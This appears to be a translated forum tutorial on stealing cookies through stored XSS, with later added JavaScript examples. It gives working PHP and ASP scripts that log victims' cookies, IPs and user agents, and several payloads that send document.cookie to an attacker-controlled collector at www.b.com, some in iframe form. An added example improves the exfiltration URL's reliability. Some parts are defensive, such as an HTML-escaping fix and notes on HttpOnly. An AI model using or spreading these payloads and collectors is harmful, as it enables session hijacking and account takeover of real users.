0x01
0x02 Background
0x03 Practice
0x04 Operational problems and solutions
0x05 Summary
--------------------------------------------------------------------
0x01: XSS (Cross-Site Scripting) refers to an attacker inserting malicious HTML code into a web page. When a user browses that page, the HTML embedded in it is triggered and achieves whatever the inserter intended.
XSS attacks fall into two categories.
The first is the internal attack: a program vulnerability in the target site is used to construct a cross-site statement.
The other is the external attack: the attacker constructs a web page that exploits the XSS vulnerability, or looks for pages with cross-site vulnerabilities on a machine other than the target. Defending against XSS is the same as defending against SQL injection: XSS is also caused by carelessness when writing web pages, so it can likewise be prevented at the web application development level.
0x02: The XSS I have encountered is of two kinds, reflected and stored.
Reflected XSS is also called non-persistent XSS: we inject our own code by constructing a URL.
For example: http://www.c.com/index.asp?name=<script>alert('xss')</script>
Nothing is stored on the site this way; you send the link you constructed and wait for someone to trigger it.
Stored XSS is also called persistent XSS: the payload is saved on the site and fires every time the page is viewed.
For example: it may appear in the personal profile fields of registered users on some websites, or in a text box...
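The reflected example above, as an added illustration that is not code from the original post: a Node.js version of the `index.asp?name=` page, first as written carelessly (the parameter is concatenated straight into the HTML) and then with the output-encoding fix that section 0x01 alludes to when it says XSS can be avoided at the development level. The render functions, the `www.c.com` base URL and the request line are assumptions for the example.

```javascript
// Added example (not from the original post): a reflected-XSS page modelled on
// index.asp?name=<script>alert('xss')</script>, as two hypothetical Node.js
// render functions, one vulnerable and one hardened.

// Vulnerable: the query parameter is concatenated into the HTML unchanged, so
// markup inside it becomes part of the page and any script in it executes.
function renderUnsafe(name) {
  return '<html><body>Hello, ' + name + '</body></html>';
}

// Escape the five characters that let text break out of an HTML text node or a
// double-quoted attribute. '&' must be replaced first so the entities produced
// by the later replacements are not re-escaped.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened: same page, but the parameter is HTML-escaped at output time, so the
// browser shows the payload as literal text instead of executing it.
function renderSafe(name) {
  return '<html><body>Hello, ' + escapeHtml(name) + '</body></html>';
}

// Extract ?name= from the request URL the way the server would. The WHATWG URL
// parser needs a base for a relative request line; www.c.com is the post's host.
function nameFromUrl(requestUrl) {
  const u = new URL(requestUrl, 'http://www.c.com');
  return u.searchParams.get('name') || '';
}

// Constructed sample request carrying the reflected payload from the post.
const sampleRequest = "/index.asp?name=<script>alert('xss')</script>";
const payload = nameFromUrl(sampleRequest);
console.log(renderUnsafe(payload)); // the <script> tag is returned live
console.log(renderSafe(payload));   // the tag is returned as &lt;script&gt;...
```

The fix is applied where the value is written into the page, not where it is read: the same `escapeHtml` protects the stored variant too, because stored XSS only differs in where the payload waits between being submitted and being rendered.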
-----------------------------------
Common payloads
<script>alert(document.cookie)</script>
<script>alert('C')</script>
------------------------------------
I have wanted to look into this recently; after some testing it finally executed successfully.
-------------------------------------
XSS has many more advanced uses. The example below shows how to obtain a victim's cookie.
---------------------------------------
0x03:
Website A www.a.com // has a stored XSS; the site itself is not under our control
Website B www.b.com // stores the cookies we collect; the script here is under our control
There is a lot of material online, but most of it is copied from one another. Worse, in the process of reprinting, the site may impose restrictions, replace escape characters, produce garbled text and so on, so the script does not run properly, and the source of the original is not given. It would also be shameful to simply paste the original.
Receiving the data on a publicly reachable page is fairly simple; an ASP or PHP script is enough.
ASP version
<%
' Take the whole query string (everything after '?') and append it to cook.txt
msg = Request.ServerVariables("QUERY_STRING")
testfile = Server.MapPath("cook.txt")
Set fs = Server.CreateObject("Scripting.FileSystemObject")
' 8 = ForAppending, True = create the file if missing, 0 = ASCII
Set thisfile = fs.OpenTextFile(testfile, 8, True, 0)
thisfile.WriteLine("" & msg & "")
thisfile.Close
Set fs = Nothing
%>
PHP version:
<?php
// Cookie arrives in the 'c' query parameter; log it with requester metadata
$cookie = $_GET['c'];
$ip = getenv('REMOTE_ADDR');
$time = date("j F, Y, g:i");
$referer = getenv('HTTP_REFERER');
$fp = fopen('cook.txt', 'a'); // append mode
fwrite($fp, 'Cookie: ' . $cookie . '<br>IP: ' . $ip . '<br>Date and Time: ' . $time . '<br>Referer: ' . $referer . '<br>');
fclose($fp);
?>
Most people save it as 1.php (or 1.asp) and upload it to their own web space:
http://www.b.com/1.php
http://www.b.com/1.asp
Then inject
<script>document.location="http://www.b.com/1.php?c="+document.cookie;</script>
or
<script>document.location="http://www.b.com/1.asp?msg="+document.cookie;</script>
Even where filtering is loose enough to allow XSS in various forms, the text box may not accept a payload this long, or the <script></script> tags may be filtered out.
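The two document.location payloads above, as an added example that is not from the original post: a Node.js model of both ends of the exchange, the URL the injected script builds from document.cookie and the `$_GET['c']` lookup the PHP collector performs. It also shows an edge case the raw concatenation misses: a cookie value containing `&` or `+` is cut or altered by query-string parsing unless the payload percent-encodes it with encodeURIComponent, which costs a few more characters in a length-limited field. The collector URL and the cookie strings are constructed.

```javascript
// Added example (not from the original post): the cookie-exfiltration exchange,
// browser side and collector side, with constructed data.

// The payload from the post as a function: raw string concatenation.
function exfilUrlRaw(collector, cookie) {
  return collector + '?c=' + cookie;
}

// Same, but the cookie is percent-encoded so that ';', '&', '+', '=' and spaces
// inside the cookie string survive query-string parsing on the collector.
function exfilUrlEncoded(collector, cookie) {
  return collector + '?c=' + encodeURIComponent(cookie);
}

// Collector side, equivalent to $_GET['c'] in the PHP script: parse the request
// URL and return the decoded 'c' parameter (null if absent).
function collectorReadCookie(requestUrl) {
  const u = new URL(requestUrl);
  return u.searchParams.get('c');
}

// Split a document.cookie string into name/value pairs; the browser joins the
// cookies with '; ' and the first '=' in each pair separates name from value.
function parseDocumentCookie(s) {
  const out = {};
  for (const part of s.split(';')) {
    const i = part.indexOf('=');
    if (i < 0) continue;
    out[part.slice(0, i).trim()] = part.slice(i + 1).trim();
  }
  return out;
}

// Constructed victim cookie string. The second cookie contains characters that
// break a raw query string: '&' starts a new parameter and '+' decodes to a space.
const victimCookie = 'ASPSESSIONIDQASCA=BOHJNFFAOLCGKC; prefs=a&b+c';
const collector = 'http://www.b.com/1.php'; // site B from the post

console.log(collectorReadCookie(exfilUrlRaw(collector, victimCookie)));     // truncated at '&'
console.log(collectorReadCookie(exfilUrlEncoded(collector, victimCookie))); // full string
console.log(parseDocumentCookie(victimCookie));
```

The session cookie itself usually survives the raw form, since ASP and PHP session ids are alphanumeric; it is the other cookies on the site that get mangled, and those are often the ones that hold the interesting state.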
0x04
Testing shows that if the payload exceeds the field's length limit, it is not written to the database and the XSS fails.
If an HTM or HTML file on B is used to carry the script instead, the cookies obtained belong to www.b.com, not to A, because the victim is first sent from A to B and the cookie is then read on B:
1) www.a.com/xss.asp  2) cross-site to www.b.com/1.html  3) www.b.com/1.html ---> www.b.com/1.php  4) obtains cookies of B
Obviously this defeats the purpose of getting cookies from A: B is already under our control, and A is the one we want to control.
So I thought: what about a single PHP page that takes no parameters and does not need to fetch anything with document.cookie? Since I do not understand PHP, I modified a piece of code found online to fetch it directly; the parameter names and so on may not be very standard.
I know nothing of ASP, ASPX, JSP, Perl or Python either, so corrections or a more efficient script are welcome.
<?php
// Request www.a.com from B's server with curl and log whatever Set-Cookie
// headers come back, together with the visitor's IP, referer and user agent
$ch = curl_init();
$ip = getenv('REMOTE_ADDR');
$time = date("Y-m-d G:i:s");
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
curl_setopt($ch, CURLOPT_URL, 'http://www.a.com');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // return the response instead of printing it
curl_setopt($ch, CURLOPT_HEADER, 1);         // include the response headers in $rs
curl_setopt($ch, CURLOPT_NOBODY, false);
time() + 94608000; // meant to say the cookies do not expire for three years; I do not know whether it makes sense (this line has no effect)
$rs = curl_exec($ch);
// greedy match: group 1 runs up to the last '=' on the line
preg_match_all('/Set-Cookie: (.+)=(.+)$/m', $rs, $regs);
foreach ($regs[1] as $i => $k) {
    $fp = fopen('C.html', 'a');
    fwrite($fp, 'K: ' . $k . '<br>IP: ' . $ip . '<br>Date and Time: ' . $time . '<br>Referer: ' . $referer . '<br>Agent: ' . $agent . '<br>');
    fclose($fp);
}
curl_close($ch);
?>
Then use the <iframe> tag:
<iframe src="http://www.b.com/1.php"></iframe> // if conditions allow and the text box length limit is loose, set the frame size explicitly
<iframe src=http://www.b.com/1.php width=0 height=0></iframe> // otherwise a visible frame is always left sitting in the page...
instead of
<script>document.location="http://www.b.com/1.php?c="+document.cookie;</script>
The <iframe> form is much shorter than the <script> form that passes document.cookie as a parameter, and it does not depend on a <script> tag surviving the filter. Note, however, what the 1.php above actually collects: the curl request is made from B's server, so the Set-Cookie headers it receives are whatever A issues to a fresh, anonymous client (a new session id), not the cookies held in the victim's browser. The victim's own cookies only reach B if they are read in the victim's browser with document.cookie and sent along, as in the <script> form.
Of course, which form to use still depends on the actual situation; the page may not allow <iframe> at all, or may restrict where it can appear...
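The Set-Cookie extraction in 1.php above, as an added example that is not from the original post: a Node.js version of the post's regular expression applied to a constructed HTTP response head, beside a parser that splits each Set-Cookie header into name, value and attributes. The response text, cookie names and values are constructed for the example.

```javascript
// Added example (not from the original post): the post's Set-Cookie regex
// versus a proper header parser, run over a constructed response head.

// The post's regex, /Set-Cookie: (.+)=(.+)$/m, applied to the whole response.
// Returns the group-1 captures, which is what the PHP logs as 'K:'.
function extractWithPostRegex(responseHead) {
  const re = /Set-Cookie: (.+)=(.+)$/gm;
  const names = [];
  let m;
  while ((m = re.exec(responseHead)) !== null) names.push(m[1]);
  return names;
}

// Parse every Set-Cookie header into {name, value, attrs}. The first '='
// separates the name from the value; everything after the first ';' is
// attributes, and flag attributes (HttpOnly, Secure) carry no value.
function parseSetCookies(responseHead) {
  const cookies = [];
  for (const line of responseHead.split(/\r?\n/)) {
    if (!/^set-cookie:/i.test(line)) continue;
    const body = line.slice(line.indexOf(':') + 1).trim();
    const [pair, ...rest] = body.split(';');
    const eq = pair.indexOf('=');
    const attrs = {};
    for (const a of rest) {
      const t = a.trim();
      if (!t) continue;
      const k = t.indexOf('=');
      if (k < 0) attrs[t.toLowerCase()] = true;
      else attrs[t.slice(0, k).trim().toLowerCase()] = t.slice(k + 1).trim();
    }
    cookies.push({
      name: eq < 0 ? '' : pair.slice(0, eq).trim(),
      value: eq < 0 ? pair.trim() : pair.slice(eq + 1).trim(),
      attrs,
    });
  }
  return cookies;
}

// Constructed response head, as site A might answer an anonymous request from
// B's server: a fresh ASP session id plus a second cookie flagged HttpOnly.
const sampleResponse =
  'HTTP/1.1 200 OK\r\n' +
  'Set-Cookie: ASPSESSIONIDQASCA=BOHJNFFAOLCGKC; path=/\r\n' +
  'Set-Cookie: auth=abc123; path=/; HttpOnly\r\n' +
  'Content-Type: text/html\r\n\r\n';

console.log(extractWithPostRegex(sampleResponse)); // name, value and 'path' lumped together
console.log(parseSetCookies(sampleResponse));      // separated name, value, attributes
```

The regex result reproduces the 'K:' line in the result below: because `(.+)=` is greedy, group 1 runs up to the last `=` on the line, which sits inside `path=/`, so name, value and the path attribute come out as one string. The parser also surfaces the HttpOnly flag; a cookie carrying it is still visible to B's own curl request (it is the session A just issued to B's server), but a cookie with that flag in the victim's browser would not be readable through document.cookie.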
----------------
Result obtained in practice:
K: aspsexxxxxxxxxqasca=BOHJNXXXXXXXXXXXXXNFFAOLCGKC; path
IP: 1x0.45.1X9.105
Date and Time: 2012-00-00 00:00:51
Referer: http://www.a.com/xss.asp
Agent: Mozilla/7.0 (linux 2.6.18) AppleWebKit/516.11 (KHTML, like Gecko) Chrome/21.0.1142.57 Safari/516.11
====================================================================
0x05 Summary. If you do not like it, please do not flame; corrections are welcome, so we can make progress together.
This was just a small test done in a specific environment; outside that environment the result may well be the opposite, and if it is wrong, that only shows the context was particular to me. Using a PHP script to harvest cookies is irresponsible, both to yourself and to others.